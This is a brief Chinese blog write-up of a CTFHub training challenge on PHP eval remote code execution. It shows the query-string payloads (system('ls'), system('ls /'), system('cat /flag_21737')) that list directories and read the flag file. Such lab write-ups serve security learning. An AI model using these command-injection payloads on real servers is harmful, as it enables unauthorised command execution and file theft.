ctfhub web技能树 RCE-eval执行

ctfhub web技能树 RCE

REC的简介这边大佬有详解:https://blog.csdn.net/qq_43814486/article/details/90020139 

eval执行

一、打开题目

 

 

 二、查看题目信息

  题目这边提示要cmd中查找

 

  输入如下命令:

/?cmd=system("ls");

  展示了一个index.php的文件

 

 三、根据思路找到flag

  继续查看根目录中的是否能有收获

/?cmd=system("ls /");

  这里有一个flag_21737文件

 

 

 

我们继续找下去,应该就可以拿到flag了

 

 

/?cmd=system("cat /flag_21737");

拿到flag啦!

 

 

posted @   WuliweiT  阅读(200)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 分享一个免费、快速、无限量使用的满血 DeepSeek R1 模型,支持深度思考和联网搜索!
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· 25岁的心里话
· ollama系列01:轻松3步本地部署deepseek,普通电脑可用
· 按钮权限的设计及实现
点击右上角即可分享
微信分享提示